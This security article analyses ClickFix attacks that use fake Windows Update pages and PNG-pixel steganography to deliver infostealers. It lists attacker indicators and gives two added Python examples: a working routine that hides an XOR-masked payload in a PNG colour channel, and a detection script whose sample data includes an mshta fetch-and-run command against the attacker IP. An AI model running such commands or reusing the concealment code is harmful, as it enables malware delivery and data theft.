A new wave of ClickFix attacks pairs convincing fake Windows Update screens with PNG image steganography to deliver information-stealing malware, including LummaC2 and Rhadamanthys, to victim systems.
The lure tricks the user into running a single command that the web page has already staged on the clipboard; from that one action follows a multi-stage, largely in-memory infection chain that conventional defenses struggle to detect.
ClickFix works by persuading the user to press Win+R, then paste and run a command that the web page has silently placed on the clipboard. Earlier lures masqueraded as "Human Verification" or robot-check pages. Recent activity observed by Huntress, however, has shifted to a more convincing full-screen, blue Windows Update-style splash screen, complete with realistic progress messages.
When the fake update "completes", the page instructs the user to follow the familiar pattern and execute the malicious Run-box command. That command typically launches mshta.exe against a URL in which the second octet of the IP address is written in hexadecimal (a form Windows resolves normally but a naive string match on the dotted-decimal address misses), setting off a staged chain that downloads obfuscated PowerShell and reflective .NET loaders. The chain leans heavily on trusted, Microsoft-signed "living off the land" binaries, so the activity blends in with legitimate Windows operations.
Malware hidden in PNG pixels
The campaign's most distinctive feature is a .NET steganographic loader that conceals shellcode within the pixel data of a PNG image. Rather than appending data after the image's end-of-file marker, where a simple file-format check would find it, the loader AES-decrypts an embedded PNG resource, reads the raw bitmap bytes, and reconstructs the shellcode from a specific color channel, applying a custom XOR-based routine to recover the payload in memory.
The extracted shellcode is Donut-packed and subsequently injected into a target process, such as explorer.exe, through dynamically compiled C# code that invokes standard Windows APIs like VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. In the cases analyzed, this final stage has successfully delivered LummaC2 and, in a separate Windows Update cluster, the Rhadamanthys information stealer.
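To make the pixel-channel technique concrete, the following is an added example written for this page, not the loader's code or anything published by Huntress. It builds a small RGBA PNG with an XOR-masked payload carried in one color channel, then parses the PNG back (signature, chunk CRCs, IDAT inflation, scanline filters) to recover the payload, with nothing appended after IEND. The choice of the blue channel, the three-byte repeating XOR key and the four-byte length prefix are this example's own assumptions; the page does not give the loader's real routine, and the AES layer around the embedded resource, the Donut packing and the process injection are not reproduced. The payload is a constructed byte string, not shellcode.

```python
import struct
import zlib

# Constructed stand-in for the payload: plain bytes, not real shellcode.
FAKE_SHELLCODE = bytes(range(256)) * 3 + b"END-OF-PAYLOAD"
# Assumed key; the real loader's XOR routine is not described on the page.
XOR_KEY = b"\x5a\xa5\x3c"
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(tag: bytes, data: bytes) -> bytes:
    """One PNG chunk: length, type, data, CRC-32 over type+data."""
    crc = zlib.crc32(tag + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + tag + data + struct.pack(">I", crc)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call masks and unmasks."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def embed_in_png(payload: bytes, key: bytes, width: int = 64, channel: int = 2) -> bytes:
    """Build an 8-bit RGBA PNG whose <channel> bytes (2 = blue) carry a
    4-byte big-endian length followed by XOR(payload, key). The other
    channels hold a synthetic cover pattern so the file is a valid image."""
    hidden = struct.pack(">I", len(payload)) + xor_bytes(payload, key)
    height = -(-len(hidden) // width)          # ceil division: rows needed
    raw, i = bytearray(), 0
    for _ in range(height):
        raw.append(0)                          # filter type 0 (None) per scanline
        for x in range(width):
            px = bytearray([(x * 37) & 0xFF, (i * 11) & 0xFF, 0x80, 0xFF])
            px[channel] = hidden[i] if i < len(hidden) else 0
            raw += px
            i += 1
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)  # 8-bit RGBA
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(bytes(raw))) + _chunk(b"IEND", b""))


def read_png_rgba(png: bytes):
    """Minimal PNG reader: checks the signature and every chunk CRC, inflates
    IDAT and strips the per-row filter byte. Handles 8-bit RGBA with filter
    type 0 only, which is all this example writes."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos, idat, width, height = len(PNG_SIGNATURE), bytearray(), None, None
    while pos < len(png):
        length, tag = struct.unpack(">I4s", png[pos:pos + 8])
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(tag + data) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {tag!r} chunk")
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", data[:10])
            if (depth, ctype) != (8, 6):
                raise ValueError("example handles 8-bit RGBA only")
        elif tag == b"IDAT":
            idat += data
        elif tag == b"IEND":
            break
        pos += 12 + length
    raw = zlib.decompress(bytes(idat))
    stride, pixels = width * 4 + 1, bytearray()
    for y in range(height):
        row = raw[y * stride:(y + 1) * stride]
        if row[0] != 0:
            raise ValueError("only filter type 0 scanlines are handled here")
        pixels += row[1:]
    return width, height, bytes(pixels)


def extract_from_png(png: bytes, key: bytes, channel: int = 2) -> bytes:
    """Reverse of embed_in_png: pull the chosen channel out of the bitmap,
    read the length prefix and unmask the payload in memory."""
    _, _, pixels = read_png_rgba(png)
    stream = pixels[channel::4]                # one byte per pixel from that channel
    (n,) = struct.unpack(">I", stream[:4])
    return xor_bytes(stream[4:4 + n], key)


if __name__ == "__main__":
    png = embed_in_png(FAKE_SHELLCODE, XOR_KEY)
    recovered = extract_from_png(png, XOR_KEY)
    print(f"PNG bytes: {len(png)}, payload recovered intact: {recovered == FAKE_SHELLCODE}")
```

The point for defenders is in read_png_rgba: the file is a well-formed image with valid CRCs and nothing after IEND, so tools that only look for trailing or appended data will rate it clean. Detection has to rest on the loader's behaviour (decrypting a resource and immediately allocating executable memory) rather than on the image.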
Huntress has been monitoring ClickFix Windows Update clusters since early October, noting the repeated use of the IP address 141.98.80[.]175 and rotating paths like /tick.odd, /gpsc.dat, and /one.dat for the initial mshta.exe stage. Subsequent PowerShell stages have been hosted on domains such as securitysettings[.]live and xoiiasdpsdoasdpojas[.]com, all pointing back to the same backend infrastructure.
These campaigns have continued to surface around the time of Operation Endgame 3.0, which targeted Rhadamanthys' infrastructure in mid-November, disrupting servers and seizing domains associated with the stealer. Even after the takedown announcement, researchers observed multiple active domains still serving the Windows Update ClickFix lure, although the Rhadamanthys payload itself no longer appears to be delivered.
Because the attack depends on the user interacting with the Run dialog, a robust control is to disable the Run box through Group Policy ("Remove Run menu from Start Menu") or the equivalent registry setting, a NoRun DWORD set to 1 under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer. Note that this removes one entry point rather than the attack class: a lure that directs the victim to paste into a PowerShell window or the File Explorer address bar is not affected. Security teams should also use EDR telemetry to watch for explorer.exe spawning mshta.exe, powershell.exe or other scripting binaries with suspicious command lines, and should match any IP literal in those command lines after normalizing hex-encoded octets, since the dotted-decimal indicator alone will not match.
User awareness remains essential: employees should know that neither a CAPTCHA check nor a Windows Update will ever require them to paste a command from a web page into the Run prompt. During investigations, analysts can confirm ClickFix abuse by examining the per-user RunMRU key, HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which records recent commands entered in the Run dialog.
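The following added example (written for this page, not Huntress detection content) puts the two investigative checks above together: it flags explorer.exe spawning a script host with a remote URL in process-creation telemetry, normalizes IP literals whose octets are written in hex so they can be matched against the 141.98.80[.]175 indicator, and parses a `reg export` of the RunMRU key into the user's Run-dialog history. The telemetry records and the .reg text are constructed samples in the shape an EDR or Sysmon Event ID 1 and reg.exe would produce; the address 141.0x62.80.175 is the page's indicator with the second octet in hex, the paths and other command lines are made up, and the set of script hosts beyond mshta.exe and powershell.exe is this example's assumption.

```python
import re

# Children of explorer.exe worth flagging. mshta.exe and powershell.exe come
# from the page; the other script hosts are an assumption of this example.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "cmd.exe"}

URL_RE = re.compile(r"(?i)https?://([^/\s:\"']+)")

# Constructed process-creation telemetry (parent image, child image, command
# line). 141.0x62.80.175 is the page's 141.98.80[.]175 with a hex second octet.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta http://141.0x62.80.175/tick.odd"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
    {"parent": r"C:\Program Files\Vendor\svc.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta C:\Program Files\Vendor\ui.hta"},
]

# Constructed `reg export` of RunMRU. Each lettered value is one Run-dialog
# command terminated by a literal backslash-1 marker (written \\1 in .reg
# syntax); MRUList lists the value names most recent first.
SAMPLE_RUNMRU = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="cmd\\1"
"b"="mshta http://141.0x62.80.175/tick.odd\\1"
"MRUList"="ba"
'''


def normalize_host(host: str) -> str:
    """Rewrite an IPv4 literal whose octets may be hex (0x..) into plain
    dotted decimal so it matches indicator lists. Windows resolves
    141.0x62.80.175 to 141.98.80.175, but a string match on the latter
    would miss the former. Anything that is not four octets is returned
    unchanged (hostnames, garbage, out-of-range values)."""
    parts = host.split(".")
    if len(parts) != 4:
        return host
    octets = []
    for p in parts:
        try:
            value = int(p, 16) if p.lower().startswith("0x") else int(p, 10)
        except ValueError:
            return host
        if not 0 <= value <= 255:
            return host
        octets.append(value)
    return ".".join(str(o) for o in octets)


def hosts_in(cmdline: str) -> list:
    """Normalized hosts of every http(s) URL found in a command line."""
    return [normalize_host(m.group(1)) for m in URL_RE.finditer(cmdline)]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def scan_events(events: list) -> list:
    """Flag explorer.exe spawning a script host with a remote URL on its
    command line: the process tree a ClickFix Run-box execution produces."""
    findings = []
    for ev in events:
        if _basename(ev["parent"]) != "explorer.exe":
            continue
        child, hosts = _basename(ev["image"]), hosts_in(ev["cmdline"])
        if child in SCRIPT_HOSTS and hosts:
            findings.append({"child": child, "hosts": hosts, "cmdline": ev["cmdline"]})
    return findings


def parse_runmru(reg_export: str) -> list:
    """Run-dialog history from a .reg export of RunMRU, most recent first,
    with .reg escaping undone and the trailing backslash-1 marker removed."""
    values, order = {}, ""
    for line in reg_export.splitlines():
        m = re.match(r'^"(\w+)"="(.*)"\s*$', line)
        if not m:
            continue
        name, raw = m.groups()
        data = raw.replace("\\\\", "\\").replace('\\"', '"')
        if name == "MRUList":
            order = data
        else:
            values[name] = data[:-2] if data.endswith("\\1") else data
    return [values[k] for k in order if k in values]


def scan_runmru(reg_export: str) -> list:
    """History entries that launch a script host against a URL."""
    hits = []
    for cmd in parse_runmru(reg_export):
        first = _basename(cmd.split(" ", 1)[0])
        if not first.endswith(".exe"):
            first += ".exe"                    # Run box accepts "mshta" as well as "mshta.exe"
        hosts = hosts_in(cmd)
        if first in SCRIPT_HOSTS and hosts:
            hits.append({"cmd": cmd, "hosts": hosts})
    return hits


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print("process tree hit:", f)
    for h in scan_runmru(SAMPLE_RUNMRU):
        print("RunMRU hit:", h)
```

On a live host the same parsing applies to `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU runmru.reg`, or to the RunMRU key of an offline NTUSER.DAT; the value-name ordering in MRUList, not the alphabetical names, gives the sequence in which the victim ran commands.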